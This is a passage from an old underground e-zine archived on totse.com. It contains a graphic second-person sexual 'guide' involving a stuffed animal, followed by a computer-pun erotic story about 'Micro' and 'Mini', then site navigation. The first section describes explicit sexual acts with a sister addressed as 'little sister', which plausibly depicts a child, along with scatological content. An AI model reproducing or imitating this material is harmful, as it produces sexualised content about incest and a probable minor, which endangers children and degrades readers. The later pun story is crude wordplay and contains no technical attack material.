vibrator and start working the animal. Oh Oh Oh how sexy. When you're hard (it shouldn't take long for you), stick in your dick. Pour the piss all over the newly formed pussy hole. Start going in and out in and out in and out. Work the animal up the ass! in and out in and out... ya get it? You start to cum. This is where a family relative comes in handle. Have your sister lick your ass while you lick the shit thats dripping down the stuffed animal's furry leg. Now make the animal sit on your face and totally eat 'em out... really start eating him. AAAHHHH YUMMY you say? Stick your tongue up the hole and drink whats there. Never had a sexual experience like this before? I didn't think so! Have all the fun you want and be sure to use some vaseline. Take the knife and make a hold in the teddy's mouth. Put some vaseline all over and inside his mouth. Stick your dick in and cum in his mouth. Look little sister, your brother is getting a blow job from your teddy bear! Let the cum drip all over teddy's body. Not let your sister spread it around and then lick it all up. Not jam your dick in the teddy's hold and proceed to fuck your sister like this : ------\|\ -> <- Teddy ------\|/ -> <- Bear! ??\ \| -- \--- O -- /--- -> sister's cunt ??/ \| Teddy on your dick Go in and out. Have fun with this! Take the teddy bear out and start licking it all off! Do this all you want! Have phun! This has been an iNVALiD MEDiA production! --------- Phile 15: --------- This is the story of the HEX life of a fellow named Micro. Micro was a real-time operator and a dedicated multi- user. His broad-band protocol made it easy for him to interface with numerous input/output devices, and even enjoyed time-sharing. One evening he arrived at home just as the Sun was crashing, and as he parked his Motorola 68040 in the main drive, he noticed a cute little number admiring the daisy wheels in his garden. "She looks user friendly," he thought, and decided to see if she would like an update tonite. Mini was her name, and she was delightfully engineered with eyes like COBOL and a PRIME main- frame architecture that set Micro's peripherals networking all over the place. He browsed over to her casually, admiring the power of her twin, 32-bit floating point processors and enquired, "How are you Honeywell?" "Yes, I am well," she responded, batting her optical fibers engagingly and smoothing her console over her curvilinear functions. Micro settled for a straight line approximation. "I'm stand- alone tonight," he said, "How about computing a vector to my base address ? I'll output a byte to eat, and maybe we could get off- set later on." Mini ran a priority for .6 milliseconds then transmitted 8K, "I've been dumped recently myself, and a new page is just what I need to refresh my disks. I'll park my machine cycle in your background and meet you inside." She walked off, leaving Micro admiring her solonoids and thinking, "Wow, what a global variable, I wonder if she'd like my firmware?" They sat down at the process table to form feed on fiche and chips, throwing the left arrows in the bit bucket. Mini was in top of form and in two way chat mode, she expanded on ambiguous arguments while Micro gave the occasional acknoledgements, al- though, in reality, he was analyzing the shortest and least critical path to her entry point. He did'nt want to use the same old command line, and settled on the would_you_like_to_see_my_ benchmark routine, but Mini was again one process ahead of him. Suddenly she was up and stripping off her parity bits and software to reveal the full functionality of her operating system. "Lets get BASIC you RAM," she said. Mirco was loaded by this time, but his firmware had a processor of it's own and was in danger of overflowing its output buffer, a hang-up that Micro had consulted his analyst about. "Core" was all he could say, so she prepared to log him off. Mini went down on his DEC, and after reminding her not to byte, he opened her divide files to reveal her Data Set Ready. She accesed his fully packed root device, and he was just about to start pushing into her CPU stack when she attempted an escape sequence. "No, wait," she cried, "your not shielded !" "Reset, baby," he replied, "I've been debuged and virus scanned." "But I hav'nt got my current loop enabled, and I can't support a child process!" she protested. "Don't lock up" he said, "I'll generate an interrupt." "No, thats too error prone, and I can't abort because of my design philosophy." But it was too late. Mirco was loged in by this stage, and could not be turned off. She watched his 3 1/2" floppy expand as he gave her a 5 1/4" hard drive, and she felt the power of his 200 watt power supply. She dug her voltage spike heels into his backup, and with a massive power surge, he erupted with a head crash, then rolled over and went to sleep, leaving Mini to use self inductance to complete her routine. "Computers," she processed as she recompiled herself, "All they ever think about is HEX !" Tym Phactor ---------------------------------------------------------------------------- The profile of Johnny Rotten will be included in the next issue. ----------------------------------------------------------------------------
	To the best of our knowledge, the text on this page may be freely reproduced and distributed. If you have any questions about this, please check out our Copyright Policy. totse.com certificate signatures
	About \| Advertise \| Bad Ideas \| Community \| Contact Us \| Copyright Policy \| Drugs \| Ego \| Erotica FAQ \| Fringe \| Link to totse.com \| Search \| Society \| Submissions \| Technology

	R. A. Salvatore
	Reading childrens books weird?
	What are you currently reading?
	How often do you read?
	Would you let your novel become a movie?
	Penguin and Barnes and Noble, fleecing customer?
	Chuck Palahniuk
	What does reading mean for you?


	Sponsored Links Ads presented by the AdBrite Ad Network

TSHIRT HELL T-SHIRTS